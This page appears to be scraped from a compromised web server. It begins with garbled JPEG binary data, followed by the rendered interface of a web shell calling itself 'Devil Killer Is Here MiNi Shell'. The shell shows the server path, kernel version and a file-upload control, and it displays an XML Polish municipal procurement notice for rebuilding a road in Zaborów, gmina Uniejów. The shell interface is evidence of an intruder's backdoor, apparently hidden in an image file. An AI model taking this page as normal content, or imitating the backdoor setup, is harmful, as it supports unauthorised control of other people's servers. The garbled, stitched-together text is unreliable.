JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17064_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-406><biuletyn>2017</biuletyn><pozycja>17064</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Gmina Uniejów</nazwa><adres_strony_internetowej_url>www.uniejow.bip.net.pl</adres_strony_internetowej_url><ulica>ul. Błogosławionego Bogumiła</ulica><nr_domu>13</nr_domu><nr_miesz></nr_miesz><miejscowosc>Uniejów</miejscowosc><kod_poczt>99210 </kod_poczt><wojewodztwo>łódzkie</wojewodztwo><tel>632 888 192</tel><fax>632 888 192</fax><zamawiajacy_panstwo>Polska</zamawiajacy_panstwo><zamawiajacy_email>urzad@uniejow.pl</zamawiajacy_email><adres_strony_internetowej></adres_strony_internetowej><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><internet></internet><regon>31101957900000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zmianie ogłoszenia</ogloszenie><nrbiuletynu>9552-2017</nrbiuletynu><datawydaniabiuletynu>17/01/2017</datawydaniabiuletynu><dotyczy>
          ogłoszenie o zamówieniu
        </dotyczy><przedmiot_zam></przedmiot_zam><zmiany><cz_2><miejsce_sekcja>II</miejsce_sekcja><miejsce>II.4)</miejsce><jest>1.	Przedmiot zamówienia realizowany jest w ramach zadania inwestycyjnego pn.: „Przebudowa drogi gminnej w miejscowości Zaborów, gm. Uniejów”. 
2.	Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych związanych z przebudową drogi gminnej w miejscowości Zaborów, gm. Uniejów o długości 1298 m po śladzie istniejącej drogi gruntowej. Zmianie nie ulega przebieg drogi.
3.	Parametry techniczne jakie należy przyjąć do projektowania:
3.1.	Klasa drogi D
3.2.	Szerokość jezdni 4,00 (3,50) m
3.3.	Szerokość poboczy 2 x 0,75 m
3.4.	Obciążenie ruchem KR 3. W programie funkcjonalno – użytkowym zostało określone obciążenie ruchem KR 1. Należy zaprojektować i wykonać roboty budowlane pod obciążenie ruchem KR 3.
4.	Przedmiot zamówienia obejmuje zaprojektowanie i wykonanie poniższych elementów:
4.1.	Wykonanie robót ziemnych
4.2.	Budowę nowych konstrukcji nawierzchni
4.3.	Przebudowę istniejących zjazdów 
4.4.	Wykonanie oznakowania poziomego i pionowego
4.5.	Likwidację kolizji z urządzeniami obcymi
4.6.	Roboty wykończeniowe i porządkowe
4.7.	Pełnienie nadzoru autorskiego
4.8.	Złożenie wniosku o pozwolenie na użytkowanie i uzyskanie jego przyjęcia przez właściwy organ (w przypadku, gdy będzie wymagane) lub zgłoszenie zakończenia robót i uzyskanie jego przyjęcia przez właściwy organ
4.9.	Sporządzenie inwentaryzacji powykonawczej
4.10.	Wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia
5.	Zakres prac projektowych oraz budowlanych obejmuje:
5.1.	Roboty przygotowawcze, tj. m.in. odtworzenie trasy i punktów wysokościowych, mechaniczne karczowanie zagajników, ścinanie drzew, karczowanie pni, rozebranie fundamentu ogrodzenia z betonu wraz z odwiezieniem na składowisko Wykonawcy i utylizację odpadów
5.2.	Roboty ziemne, tj. m.in. mechaniczne i ręczne wykonanie wykopu, formowanie i zagęszczenie nasypów wraz z załadunkiem, transportem i utylizacją odpadów (urobku)
5.3.	Podbudowy, tj. m.in. mechaniczne profilowanie i zagęszczanie podłoża, wykonanie warstwy mrozoodpornej, oczyszczenie oraz skropienie warstw niebitumicznych oraz bitumicznych, wykonanie podbudowy z kruszywa łamanego
5.4.	Nawierzchnie, tj. m.in. wykonanie warstw wiążących oraz ścieralnych
5.5.	Roboty wykończeniowe, tj. m.in. wykonanie umocnienia poboczy, profilowanie nawierzchni zjazdów
5.6.	Urządzenia bezpieczeństwa ruchu, tj. m.in. ustawienie słupków oraz montaż tarcz znaków drogowych
6.	Teren prac budowlanych winien być zabezpieczony przed dostępem osób postronnych, a po zakończeniu realizacji robót Wykonawca zobowiązany jest doprowadzić teren budowy do stanu sprzed realizacji inwestycji. 
7.	Materiały z prac rozbiórkowych nadające się do ponownego wykorzystania Wykonawca zobowiązany jest złożyć na terenie działki, na której prowadzone są roboty budowlane w miejscu wskazanym przez Zamawiającego. 
8.	Materiały z prac rozbiórkowych nienadające się do ponownego wykorzystania Wykonawca zobowiązany jest usunąć na własny koszt na teren wysypiska.
9.	W przypadku uszkodzenia nawierzchni terenu działki bądź terenu poza obszarem realizacji robót Wykonawca zobowiązany jest doprowadzić do stanu pierwotnego. 
10.	Wykonawca zobowiązany jest dostarczyć dokumentacje projektowe uzgodnione ze wszystkimi instytucjami, których akceptacja jest wymagana dla wykonania prac na podstawie sporządzonej dokumentacji.
11.	Wykonawca zobowiązany jest do przygotowania, złożenia i uzyskania decyzji zezwalającej na realizację przedmiotowej inwestycji, tj. zgłoszenie lub decyzję o pozwoleniu na budowę
12.	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji stanowiącej załącznik do niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
13.	Zamawiający posiada decyzję o pozwoleniu na wykonanie zjazdu publicznego na drogę powiatową oraz decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia.
14.	Dokumentacja projektowa określona powyżej musi być zgodna z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r.  w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego i muszą zawierać wszystkie elementy określone danym rozporządzeniem. 
15.	Do prawidłowej realizacji przedmiotu zamówienia Wykonawca zobowiązany jest uzyskać wszystkie wymagane uzgodnienia formalno – prawne i decyzje administracyjne (pozwolenia, uzgodnienia, opinie) zezwalające na realizację robót budowlanych dla danego zadania.
16.	Wykonawca zobowiązany jest do dostosowania przedmiotu zamówienia do stanu prawnego obowiązującego w dniu przekazania opracowań Zamawiającemu, jeżeli w czasie wykonywania opracowań akty prawne ulegną zmianie.
17.	Wykonawca zobowiązany jest uzyskać wszelkie wymagane uzgodnienia, materiały oraz informacje niezbędne do prawidłowej realizacji przedmiotu zamówienia na własny koszt. 
18.	Wykonawca będzie zobowiązany zapewnić nadzór autorski nad robotami budowlanymi przeprowadzanymi w oparciu o sporządzoną dokumentację projektową polegającym na minimum cotygodniowej wizycie na terenie prowadzonych robót budowlanych. 
19.	W ramach przedmiotu zamówienia Wykonawca zobowiązany jest przedłożyć wersje papierowe:
19.1.	Projekt budowlano – wykonawczy w ilości 7 egzemplarzy 
19.2.	Przedmiar, kosztorys nakładczy, kosztorys inwestorski w ilości 2 egzemplarzy
19.3.	Specyfikacje techniczne wykonania i odbioru robót w ilości 2 egzemplarzy
19.4.	Pozostałą dokumentację wymaganą przepisami prawa
20.	Projekt budowlany powinien zawierać projekt stałej organizacji ruchu.
21.	Wersje elektroniczne powyższych opracowań należy dostarczyć w ilości 2 egzemplarzy w formatach: teksty w formacie .doc, rysunki w formacie .dwg, kosztorysy w formacie .xls. Wszystkie wersje elektroniczne Wykonawca dostarczy dodatkowo w formacie .pdf.
22.	Dokumentacja projektowa powinna:
22.1.	Umożliwić realizację inwestycji w formie „zaprojektuj i wybuduj” z uwzględnieniem przepisów ustaw prawo zamówień publicznych
22.2.	W swojej treści określić przedmiot zamówienia, w szczególności technologię robót, materiały i urządzenia, parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii, urządzeń i wyposażenia
22.3.	Opisywać przedmiot zamówienia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane
23.	Roboty budowlane stanowić będą całość praz związanych z przebudową drogi gminnej, określoną w opisie przedmiotu zamówienia, na podstawie sporządzonej dokumentacji projektowej – projektu budowlano – wykonawczego, zgodnie ze specyfikacją techniczną wykonania i odbioru robót, pozwoleniem na budowę (zgłoszeniem robót) oraz zgodnie z obowiązującymi przepisami. 
24.	Przed przystąpieniem do wyceny robót zaleca się dokonania wizji lokalnej w terenie.
25.	Przedmiary załączone do postępowania należy traktować pomocniczo. 
26.	Dokumentację projektową należy wykonać na podstawie PFU wraz z załącznikami dołączonymi do niniejszej SIWZ oraz zgodnie z opisem przedmiotu zamówienia. 
27.	Roboty budowlane należy wykonać zgodnie z opracowanymi przez Wykonawcę projektami budowlanymi i wykonawczymi zatwierdzonymi przez Zamawiającego i inspektora Nadzoru.
28.	Program funkcjonalno – wykonawczy dołączony do niniejszej SIWZ nie jest projektem budowlanym. Obejmuje jedynie zbiór wytycznych oraz kwestii istotnych dla Zamawiającego stanowiącymi podstawę do jego opracowania. 
29.	Zmiany dokonywane w dokumentacji projektowej sporządzanej przez Wykonawcę nie stanowią zmian umowy z Zamawiającym w ramach danego zadania, o ile nie naruszają założeń stanowiących podstawę do opisu  przedmiotu zamówienia.
30.	Dokumentacja dołączona do SIWZ i opisu przedmiotu zamówienia służy do ustalenia planowanych kosztów prac projektowych i robót budowlanych w celu sporządzenia ceny oferty.
31.	Wykonawca nie może domagać się podwyższenia wynagrodzenia stanowiącego przedmiot oferty ze względu ma zwiększenie zakresu prac do realizacji, który to zakres zostanie określony po szczegółowej analizie przedmiotu zamówienia w ramach realizowanej dokumentacji projektowej. 
32.	Po wyborze oferty, przed podpisaniem umowy Oferent przedłoży kosztorys ofertowy, na podstawie którego skalkulował cenę oferty. 
33.	Wykonawca zobowiązany jest utrzymywać porządek na terenie budowy, na bieżąco i systematycznie likwidować wszelkie zagrożenia. 
34.	Wykonawca zamówienia musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na cenę zamówienia. W związku z powyższym wymagane jest od oferentów bardzo szczegółowe sprawdzenie warunków wykonania zamówienia. 
35.	Roboty budowlane należy wykonać zgodnie z obowiązującymi normami, sztuką budowlaną, przepisami BHP, ppoż. oraz poleceniami inspektora nadzoru inwestorskiego.
36.	Wykonawca po wykonaniu robót przygotuje wszelkie wymagane dokumenty do przedstawienia dla organu nadzoru budowlanego w celu zgłoszenia zakończenia robót, w tym dokumentację powykonawczą.
37.	Wykonawca dostarczy Zamawiającemu operat kolaudacyjny zawierający dodatkowo oświadczenie o złożeniu w Ośrodku Geodezjno – Kartograficznym inwentaryzacji geodezyjnej powykonawczej.
38.	 Wykonawca w terminie 2 miesięcy od dnia zakończenia realizacji robót zobowiązany jest przekazać Zamawiającemu zarejestrowaną w państwowym zasobie geodezyjno – kartograficznym inwentaryzacją geodezyjną powykonawczą.
39.	Wykonawca zobowiązany jest dostarczyć Zamawiającemu przy odbiorze robót (w dniu podpisania protokołu odbioru końcowego przedmiotu zamówienia) kosztorys powykonawczy z realizacji przedsięwzięcia. Kosztorys powykonawczy stanowi załącznik do protokołu odbioru końcowego przedmiotu zamówienia. 
40.	Zamawiający zgodnie z art. 29 ust. 3 ustawy Pzp informuje, że jeżeli w SIWZ i jej załącznikach wskazane zostały znaki towarowe, patenty, pochodzenie materiałów lub urządzeń, nazwy ich producentów i dystrybutorów, nazwy własne produktów, pochodzenie urządzeń itd. mają one charakter przykładowy. Zostały one bowiem określone jedynie w celu sprecyzowania parametrów i wymogów techniczno-użytkowych przedmiotu zamówienia. 
41.	Zamawiający dopuszcza składanie ofert materiałowo i technologicznie równoważnych. Zaoferowanie rozwiązań równoważnych nie może prowadzić do zdefiniowania nowego, w kluczowych elementach niezgodnego z dokumentacją projektową, opisu zamówienia.
42.	Zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały czy urządzenia spełniają wymagania określone przez Zamawiającego. W związku z powyższym, w przypadku zaoferowania materiałów i urządzeń równoważnych do materiałów i urządzeń określonych w dokumentacji, Wykonawca zobowiązany jest załączyć do oferty szczegółowy opis oferowanych materiałów i urządzeń wskazując, że zaproponowane rozwiązania są równoważne pod względem technicznym, jakościowym i funkcjonalnym. Nie wykazanie materiałów i urządzeń równoważnych traktowane będzie, jako deklaracja zastosowania materiałów i urządzeń wymienionych w dokumentacji projektowej.
43.	Zaleca się oferentom szczegółowe zapoznanie się z treścią Specyfikacji Istotnych Warunków Zamówienia, dokonanie wizji lokalnej w terenie, zdobycie wszelkich informacji niezbędnych do prawidłowego przygotowania oferty oraz sprawdzenie i zweryfikowanie dokumentacji oraz niezwłocznego poinformowania Zamawiającego o ewentualnych błędach i przeoczeniach.
44.	Wykonawca nie może wykorzystywać błędów lub braków w programie funkcjonalno – użytkowym, a o ich wykryciu winien natychmiast powiadomić Zamawiającego, który dokona odpowiednich zmian lub poprawek.
45.	Wykonawca zobowiązany jest konsultować z Zamawiającym wszystkie założenia i rozwiązania projektowane w dokumentacji. 
46.	Dokumentacje projektowe muszą być sporządzone zgodnie z obowiązującymi przepisami prawa, w szczególności:
46.1.	Ustawa prawo budowlane
46.2.	Ustawa o wyrobach budowlanych
46.3.	Rozporządzenie Ministra transportu i Gospodarki Morskiej w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie
46.4.	Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego
47.	Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020
48.	Wykonawca przeniesie na Zamawiającego autorskie prawa majątkowe i prawa zależne do wszelkich egzemplarzy sporządzonych opracowań na wszystkich polach eksploatacji wymienionych w art. 50 ustawy o prawie autorskim i prawach pokrewnych. W szczególności Wykonawca przeniesie na Zamawiającego autorskie prawo majątkowe do utworu, na następujących polach eksploatacji:
a)	autorskie prawa majątkowe do wszystkich utworów w rozumieniu ustawy o Prawie autorskim i prawach pokrewnych wytworzonych w trakcie realizacji przedsięwzięcia, w szczególności takich jak: raporty, mapy, wykresy, rysunki, plany, dane statystyczne, ekspertyzy, obliczenia inne dokumenty powstałe przy realizacji przedsięwzięcia oraz broszury, zwanych dalej utworami;
b)	Zezwala Zamawiającemu na korzystanie z opracowań utworów oraz ich przeróbek oraz na rozporządzanie tymi opracowaniami wraz z przeróbkami - tj. udziela Zamawiającemu praw zależnych.
- użytkowania  utworów na własny użytek, użytek swoich jednostek organizacyjnych oraz użytek osób trzecich w celach związanych z realizacją zadań Zamawiającego,
- utrwalenie utworów na wszelkich rodzajach nośników, a w szczególności na nośnikach video, taśmie światłoczułej, magnetycznej, dyskach komputerowych oraz wszystkich typach nośników przeznaczonych do zapisu cyfrowego (np. CD, DVD, Blue-ray, pendrive, itd.),
- zwielokrotnianie utworów dowolną techniką w dowolnej ilości, w tym techniką magnetyczną na kasetach video, techniką światłoczułą i cyfrową, techniką zapisu komputerowego na wszystkich rodzajach nośników dostosowanych do tej formy zapisu, wytwarzanie jakąkolwiek techniką egzemplarzy utworu, w tym techniką drukarską, reprograficzną, zapisu magnetycznego oraz techniką cyfrową,
- wprowadzania utworów do pamięci komputera na dowolnej liczbie stanowisk komputerowych oraz do sieci multimedialnej, telekomunikacyjnej, komputerowej, w tym do Internetu,
- wyświetlanie i publiczne odtwarzanie utworu,
- nadawanie całości lub wybranych fragmentów utworu za pomocą wizji albo fonii przewodowej i bezprzewodowej przez stację naziemną,
- nadawanie za pośrednictwem satelity,
- reemisja,
- wymiana nośników, na których utwór utrwalono,
- wykorzystanie w utworach multimedialnych,
- wykorzystywanie całości lub fragmentów utworu co celów promocyjnych i reklamy,
- wprowadzanie zmian, skrótów,
- sporządzenie wersji obcojęzycznych, zarówno przy użyciu napisów, jak i lektora,
- publiczne udostępnianie utworu w taki sposób, aby każdy mógł mieć do niego dostęp w miejscu i w czasie przez niego wybranym
- Prawo do przeniesienia autorskich praw majątkowych i praw zależnych na podmiot trzeci
- rozpowszechnianie przez prezentację lub publikację w całości lub we fragmentach, na wystawie, w katalogach, wydawnictwach promujących inwestycje lub Zamawiającego, w mediach, na spotkaniach, konferencjach i na stronach internetowych;
- możliwości reprodukcji i publikacji utworu w całości lub we fragmentach za pomocą dowolnej techniki;
- użyczanie, najmowanie, wprowadzanie do obrotu;
- prawa do opracowania utworu w szczególności jego przeróbki lub adaptacji;
- sporządzanie projektów na podstawie utworu;
- prawa do wykonywania robót budowlanych i innych prac sporządzonych na podstawie utworu
- wykorzystywanie do opracowania wniosków o dofinansowanie 
- przetwarzanie, wprowadzanie zmian, poprawek i modyfikacji
- udostępnianie wykonawcom, w tym również wykonanych kopii
- wykorzystywanie wielokrotne utworu do realizacji celów, zadań i inwestycji Zamawiającego;
- wyświetlanie i publiczne odtwarzanie utworu
49.	Wynagrodzenie za przeniesienie autorskich praw majątkowych zostanie zawarte w wynagrodzeniu ryczałtowym.
50.	Wykonawca zobowiązany jest w szczególności do:
50.1.	Uzgadniania z Zamawiającym wszystkie rozwiązania projektowe
50.2.	Dostarczeniu Zamawiającemu dokumentacji budowlano – wykonawczej uzgodnionej ze wszystkimi instytucjami, których akceptacja jest wymagana przepisami prawa
50.3.	dostarczenia Zamawiającemu w dniu przekazania placu budowy oświadczenia o podjęciu obowiązków kierownika budowy potwierdzonych „za zgodność z oryginałem” przez Wykonawcę, kopii zaświadczeń o przynależności do właściwej izby samorządu zawodowego, potwierdzających wpis tej osoby na listę członków odpowiedniej izby oraz potwierdzonych „za zgodność z oryginałem” przez Wykonawcę kopii uprawnień budowlanych,
50.4.	zapewnienia kierowania robotami budowlanymi przez pracowników Wykonawcy, posiadających odpowiednie uprawnienia budowlane oraz kwalifikacje zawodowe,
50.5.	uzyskania każdorazowo akceptacji i zatwierdzenia przez Zamawiającego zmiany kierownika budowy w stosunku do osoby wskazanej w ofercie,
50.6.	uzyskania na własny koszt ubezpieczeń i zabezpieczeń należytego wykonania umowy,
50.7.	wykonania i ustawienia tablic informacyjnych wynikających z Prawa Budowlanego,
50.8.	oznaczenia terenu budowy, odpowiednie oznakowanie i zabezpieczenie miejsc prowadzenia robót zgodnie z obowiązującymi przepisami bhp,
50.9.	zagospodarowania terenu budowy i zaplecza socjalnego dla potrzeb własnych – zgodnie z obowiązującymi w tym zakresie przepisami, 
50.10.	utrzymania porządku na terenie budowy w czasie realizacji inwestycji,
50.11.	zgłaszania Inspektorowi nadzoru robót ulegających zakryciu lub zanikających,
50.12.	przeprowadzania niezbędnych badań laboratoryjnych,
50.13.	wywozu i utylizacji odpadów i gruzu.
51.	Kody Wspólnego Słownika Zamówień (CPV):
51.1.	Główny przedmiot: 45.00.00.00 – 7 Roboty budowlane
51.2.	Dodatkowe przedmioty: 45.23.31.40 – 2 Roboty drogowe
45.23.31.20 - 6 Roboty w zakresie budowy dróg 
45.10.00.00 – 8 Przygotowanie terenu pod budowę
45.23.31.41 - 9 Roboty w zakresie konserwacji dróg 
45.23.32.00 – 1 Roboty w zakresie różnych nawierzchni 
45.22.00.00 – 5 Roboty inżynieryjne i budowlane
71.32.00.00 – 7 usługi inżynieryjne w zakresie projektowania
52.	Wykonawca udzieli gwarancji (minimum 60 miesięcy, maksymalnie 78 miesięcy) na wykonany przedmiot zamówienia. Gwarancja jest udzielana na warunkach określonych we wzorze umowy. Na okres gwarancji wykonawca wydłuża termin rękojmi.
53.	Zamawiający nie przewiduje zamówień, o których mowa w art.67 ust. 1 pkt 6 i 7 ustawy Pzp
54.	Części zamówienia Zamawiający nie dopuszcza składanie ofert częściowych. 
</jest><ma>1.	Przedmiot zamówienia realizowany jest w ramach zadania inwestycyjnego pn.: „Przebudowa drogi gminnej w miejscowości Zaborów, gm. Uniejów”. 
2.	Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych związanych z przebudową drogi gminnej w miejscowości Zaborów, gm. Uniejów o długości 1298 m po śladzie istniejącej drogi gruntowej. Zmianie nie ulega przebieg drogi.
3.	Parametry techniczne jakie należy przyjąć do projektowania:
3.1.	Klasa drogi D
3.2.	Szerokość jezdni 4,00 (3,50) m
3.3.	Szerokość poboczy 2 x 0,75 m
3.4.	Obciążenie ruchem KR 1. 
3.5.	 Należy zaprojektować i wykonać warstwę wiążącą i warstwę ścieralną z zastosowaniem materiałów dopuszczonych do zastosowania dla kategorii ruchu KR 3. Rodzaj konstrukcji i grubości warstw zgodnie z PFU, załącznikami do SIWZ i opisem przedmiotu zamówienia. 
4.	Przedmiot zamówienia obejmuje zaprojektowanie i wykonanie poniższych elementów:
4.1.	Wykonanie robót ziemnych
4.2.	Budowę nowych konstrukcji nawierzchni
4.3.	Przebudowę istniejących zjazdów 
4.4.	Wykonanie oznakowania poziomego i pionowego
4.5.	Likwidację kolizji z urządzeniami obcymi
4.6.	Roboty wykończeniowe i porządkowe
4.7.	Pełnienie nadzoru autorskiego
4.8.	Złożenie wniosku o pozwolenie na użytkowanie i uzyskanie jego przyjęcia przez właściwy organ (w przypadku, gdy będzie wymagane) lub zgłoszenie zakończenia robót i uzyskanie jego przyjęcia przez właściwy organ
4.9.	Sporządzenie inwentaryzacji powykonawczej
4.10.	Wszelkie inne roboty jakie okażą się niezbędne dla wykonania przedmiotu zamówienia
5.	Zakres prac projektowych oraz budowlanych obejmuje:
5.1.	Roboty przygotowawcze, tj. m.in. odtworzenie trasy i punktów wysokościowych, mechaniczne karczowanie zagajników, ścinanie drzew, karczowanie pni, rozebranie fundamentu ogrodzenia z betonu wraz z odwiezieniem na składowisko Wykonawcy i utylizację odpadów
5.2.	Roboty ziemne, tj. m.in. mechaniczne i ręczne wykonanie wykopu, formowanie i zagęszczenie nasypów wraz z załadunkiem, transportem i utylizacją odpadów (urobku)
5.3.	Podbudowy, tj. m.in. mechaniczne profilowanie i zagęszczanie podłoża, wykonanie warstwy mrozoodpornej, oczyszczenie oraz skropienie warstw niebitumicznych oraz bitumicznych, wykonanie podbudowy z kruszywa łamanego
5.4.	Nawierzchnie, tj. m.in. wykonanie warstw wiążących oraz ścieralnych
5.5.	Roboty wykończeniowe, tj. m.in. wykonanie umocnienia poboczy, profilowanie nawierzchni zjazdów
5.6.	Urządzenia bezpieczeństwa ruchu, tj. m.in. ustawienie słupków oraz montaż tarcz znaków drogowych
6.	Wykonawca zobowiązany jest do zaprojektowania i wykonania zjazdu publicznego do drogi powiatowej nr 2526E o nawierzchni gruntowej.
7.	Zamawiający wymaga zaprojektowania drogi o jednej jezdni o jednym pasie ruchu dwukierunkowym o szerokości 4,0 m (3,5 m) z jedną mijanką na działce nr ewid. 39 na wysokości działek o nr ewid. 81 i 82, zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie z późn. zm., spełniając wymagania określone w §37 i §126 w/w rozporządzenia.
8.	Po stronie Zamawiającego będzie wystąpienie, uzyskanie i wykonanie ewentualnych nasadzeń wynikających z decyzji zezwalającej na wycinkę drzew. 
9.	Teren prac budowlanych winien być zabezpieczony przed dostępem osób postronnych, a po zakończeniu realizacji robót Wykonawca zobowiązany jest doprowadzić teren budowy do stanu sprzed realizacji inwestycji. 
10.	Materiały z prac rozbiórkowych nadające się do ponownego wykorzystania Wykonawca zobowiązany jest złożyć na terenie działki, na której prowadzone są roboty budowlane w miejscu wskazanym przez Zamawiającego. 
11.	Materiały z prac rozbiórkowych nienadające się do ponownego wykorzystania Wykonawca zobowiązany jest usunąć na własny koszt na teren wysypiska.
12.	W przypadku uszkodzenia nawierzchni terenu działki bądź terenu poza obszarem realizacji robót Wykonawca zobowiązany jest doprowadzić do stanu pierwotnego. 
13.	Wykonawca zobowiązany jest dostarczyć dokumentacje projektowe uzgodnione ze wszystkimi instytucjami, których akceptacja jest wymagana dla wykonania prac na podstawie sporządzonej dokumentacji.
14.	Wykonawca zobowiązany jest do przygotowania, złożenia i uzyskania decyzji zezwalającej na realizację przedmiotowej inwestycji, tj. zgłoszenie lub decyzję o pozwoleniu na budowę
15.	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji stanowiącej załącznik do niniejszej Specyfikacji Istotnych Warunków Zamówienia. 
